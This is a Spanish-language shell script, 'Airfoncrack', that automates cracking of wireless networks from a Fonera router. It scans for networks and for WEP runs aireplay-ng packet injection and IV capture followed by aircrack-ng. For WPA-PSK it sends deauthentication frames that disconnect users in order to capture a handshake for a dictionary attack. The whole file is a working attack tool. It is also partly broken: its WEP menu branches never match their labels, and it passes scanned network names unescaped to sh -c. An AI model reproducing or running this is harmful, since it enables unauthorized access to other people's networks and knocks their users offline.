#!/bin/ash
# Airfoncrack
# Script para crack de wireless automático
# v1.0 por Nitz corregido por Lord Gokuh (gokuhs)
# Agradecimientos a wireless, lemmke, badblody y ring0
# Fecha de inicio: 5-04-2007
# Fecha final: 05-10-2009

saca_ip(){
	IP=`ifconfig eth0 | grep "inet addr:" | sed 's/          inet addr://g' | awk '{ print $1 }'`
}

prepara_escanear() {
	wlanconfig ath0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig ath1 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig kis0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig wifi0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig ath1 create wlandev wifi0 wlanmode sta 1>/dev/null 2>/dev/null 3>/dev/null
	ifconfig ath1 up 1>/dev/null 2>/dev/null 3>/dev/null
}

prepara_crack() {
	wlanconfig ath0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig ath1 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig kis0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig wifi0 destroy 1>/dev/null 2>/dev/null 3>/dev/null
	wlanconfig ath0 create wlandev wifi0 wlanmode monitor 1>/dev/null 2>/dev/null 3>/dev/null
	iwconfig ath0 rate 1M 1>/dev/null 2>/dev/null 3>/dev/null
	ifconfig ath0 up  1>/dev/null 2>/dev/null 3>/dev/null
}

buscaredes() {
	iwlist ath1 scan > /tmp/airfoncrack.temp
	BSSID=`grep "          Cell " /tmp/airfoncrack.temp | awk '{ print $5 }'`
	current=1

	cadena="dialog --backtitle \"AirFonCrack v1.0 by Nitz Fixed By Lord Gokuh\" --menu \"Seleccione la red Wireless:\\n CH# . BSSID . . . . . . ESSID\" 0 0 0 "
	
	for i in `echo $BSSID`; do
		CANAL=`grep "(Channel " /tmp/airfoncrack.temp | awk '{ print $4 }' | sed 's/)$//g' | sed -n "$current p"`
		ESSID=`grep ESSID /tmp/airfoncrack.temp | sed 's/                    ESSID:"//g' | sed 's/"$//g' | sed -n "$current p" | sed 's/"/\\\"/g'`
		cadena=$cadena$(echo "\"$CANAL $i $ESSID\" \"\" ")
		let current=$current+1
	done;

	cadena=$cadena$(echo " 2>/tmp/airfoncrack.temp")

	sh -c "$cadena"
	
	ESSID=`awk '{ print $3 }' /tmp/airfoncrack.temp | sed 's/"/\\\"/g'`
	BSSID=`awk '{ print $2 }' /tmp/airfoncrack.temp`
	CANAL=`awk '{ print $1 }' /tmp/airfoncrack.temp`
	if [ -z $ESSID ]; then
		rm /tmp/airfoncrack.temp
		clear
		exit;
	fi;
}

wepowpa() {
	dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --menu "¿Que tipo de clave es??" 0 0 0 "WEP" "" "WPA-PSK" "" 2>/tmp/airfoncrack.temp
	ENCRIPTACION=`cat /tmp/airfoncrack.temp`
	if [ -z $ENCRIPTACION ]; then
		rm /tmp/airfoncrack.temp
		clear
		exit;
	fi;
}

crackwep() {
	rm /tmp/www/airfoncrack-packages*
	dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere configurando Interfaces..." 3 19
	aireplay-ng -3 -b $BSSID -h $MAC ath0  1>/dev/null 2>/dev/null 3>/dev/null &
	while true; do aireplay-ng -1 1 -e \"$ESSID\" -a $BSSID -h $MAC ath0 1>/dev/null 2>/dev/null 3>/dev/null; done &
	dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --menu "Ahora airodump-ng está capturando IVS. Puedes crackear con aircrack-ng en la fonera, pero es mejor hacerlo en un PC (dado que este ultimo es mas rapido). Que es lo que quieres hacer?" 0 0 0 "Crackearlo en el PC" "" "Crackearlo con la fonera" "" 2>/tmp/airfoncrack.temp
	case `cat /tmp/airfoncrack.temp` in
		'Crack ivs in my PC')
			dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --msgbox "Puedes descargarte el archivo de IVS desde http://$IP/airfoncrack-packages-01.ivs y probar a crackearlo con aircrack-ng :)" 0 0
			rm /tmp/airfoncrack.temp
			airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0
			;;
		'Crack ivs with fonera software')
			clear
			airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0  1>/dev/null 2>/dev/null 3>/dev/null &
			dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere lanzando aircrack-ng..." 3 19
			sleep 10
			aircrack-ng /tmp/www/airfoncrack-packages-01.ivs
			echo
			echo "Aircrack está parado. Si tu no tienes la clave WEP es porque no tienes suficientes IVS aun, puedes volver a arrancar aircrack con 'aircrack-ng /tmp/www/airfoncrack-packages-*.ivs'."
			;;
		*)
			rm /tmp/airfoncrack.temp
			clear
			exit
			;;
	esac
	echo
	echo "Recueda: puedes descargarte el archivo de captura desde http://$IP/airfoncrack-packages-01.ivs y prueba con tu aircrack-ng :)";
	echo
	echo "Bastantes procesos están aun en ejecucion, airodump-ng y aireplay-ng. Puedes mandarles la señal kill con 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'."
	exit

}
crackwpapsk() {
	rm /tmp/www/airfoncrack-packages*
	airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0  1>/dev/null 2>/dev/null 3>/dev/null &
	if dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --yesno "La fonera necesita capturar un handshake. Tu puedes caustar uno pulsando en \"Yes\", pero todos los usuarioas que esten conectados al punto de acceso se caerán.\n\nEstas seguro que quieres causar un handshake?" 0 0;
		then
			dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere, enviando la señal de desautentificacion..." 3 19
			aireplay-ng -0 5 -a $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null
			while dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --yesno "Quieres repetir el ataque?" 0 0; do
				dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere, enviando la señal de desautentificacion..." 3 19
				aireplay-ng -0 5 -a $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null;
			done;
	fi;

	dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --msgbox "Debes descargarte el archivo de capturas de http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" 0 0
	rm /tmp/airfoncrack.temp
	clear
	echo "Recueda: puedes descargarte el archivo de captura desde http://$IP/airfoncrack-packages-01.ivs y prueba con tu aircrack-ng :)";
	echo
	echo "Para obtener la clave WPA-PSK en el PC debes ejecutar: aircrack-ng -a 2 /DIRECTORIO/airfoncrack-packages-01.ivs -w /DIRECTORIO/delDiccionario"
	echo
	echo "Bastantes procesos están aun en ejecucion, airodump-ng y aireplay-ng. Puedes mandarles la señal kill con 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'."
	exit

}

trap "echo
echo \"Probablemente aun se esté ejecutando aireplay-ng y airodump-ng, prueba a ejecutar 'killall airfoncrack & killall airodump-ng & killall aireplay-ng'\"
exit" 1 2 3 9 15

saca_ip
prepara_escanear
dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere configurando Interfaces para escanear..." 3 19
sleep 3	

buscaredes

wepowpa

prepara_crack
dialog --backtitle "AirFonCrack v1.0 by Nitz Fixed by Lord Gokuh" --infobox "Porfavor espere configurando Interfaces para crackear..." 3 19
sleep 5

MAC=`ifconfig | grep wifi0 | awk '{ print $5 }'`

case $ENCRIPTACION in
	'WEP' )
		crackwep
		;;
	'WPA-PSK' )
		crackwpapsk
		;;
esac